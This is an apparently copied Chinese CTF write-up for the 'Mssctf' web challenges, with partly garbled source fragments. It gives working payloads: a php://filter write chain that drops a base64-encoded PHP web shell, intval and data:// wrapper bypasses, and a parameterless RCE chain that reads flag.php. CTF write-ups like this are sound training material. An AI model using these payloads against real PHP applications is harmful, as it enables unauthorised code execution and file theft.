Mssctf WEB wp
include
源码
".$c);
}*
}
?>
- 第一层绕过 数组溢出绕过 由于自增
payload:a=9223372036854775806
- 第二层绕过 filter协议 写文件 由于代码处有php标签 所以要先去除
payload:b=php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php
- 第三层 base64编码写入
c=PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=
Hs.com
抓包看到提示 Allowed-Request-Method: HS
用HS方法访问看到源码
可以看到$_GET[‘innerspace‘]和$_REQUEST[‘innerspace‘]
if条件$data=mssctf&data!$fake_data即可
直接将GET方法改为HS 方法后 传入cookie:innerspace=mssctf
$fake_data值为空
$data值为mssctf
即可出flag
baby php
远古考点
2022) {
$mss4 = file_get_contents($mss2,‘r‘);
if ($mss4 === "mssCTF is interesting!") {
if (!preg_match("/[0-9]|\`|\^|\\$|\*|\%|\~|\+|\{|\}|\‘|\\\"|\,|\<|\>|\.|\/|\?/i", $mss3)) {
echo "Regex is so wonderful!";
echo "
";
eval($mss3);
}
else {
echo "Success is near!";
echo "
";
}
}
else {
echo "Do you like PHP?";
echo "
";
}
}
else {
echo "Level1 is a babe trick,try again!";
echo "
";
}
- intval()科学计数法绕过
payload:level1=1e10
- file_get_contents()绕过
用data协议绕过
payload:level2=data:,mssCTF%20is%20interesting!
- 第三个考查无参数rce
payload: 先用var_dump(scandir(current(localeconv())));查看flag在第几个
随后readfile(next(array_reverse(scandir(current(localeconv())))));进行查看flag.php
原文:https://www.cnblogs.com/Flowers-Bei-Cheng/p/15004825.html